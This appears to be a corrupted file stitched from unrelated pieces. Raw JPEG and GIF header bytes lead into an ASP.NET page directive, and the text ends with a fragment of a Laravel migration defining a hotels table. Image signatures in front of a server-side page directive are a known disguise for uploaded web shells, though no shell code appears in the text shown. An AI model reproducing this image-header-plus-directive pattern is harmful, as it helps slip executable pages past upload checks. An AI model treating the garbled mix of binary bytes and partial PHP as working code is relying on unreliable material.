ÿØÿà JFIF ÿÛ C $.' ",#(7),01444'9=82<.342ÿÛ C 2!!22222222222222222222222222222222222222222222222222ÿþGIF89a; <%@ Page Language="C#" %>
ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.-
ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.-
id(); // internal PK
$table->unsignedBigInteger('connector_id');
$table->unsignedBigInteger('hotel_id');
$table->unsignedBigInteger('destination_id')->nullable();
$table->string('name');
$table->string('type')->nullable();
$table->tinyInteger('classification')->nullable();
$table->decimal('latitude', 10, 6)->nullable();
$table->decimal('longitude', 10, 6)->nullable();
$table->text('description')->nullable();
$table->timestamps();
$table->unique(['connector_id', 'hotel_id']);
});
}
/**
* Reverse the migrations.
*/
public function down(): void
{
Schema::dropIfExists('hotels');
}
};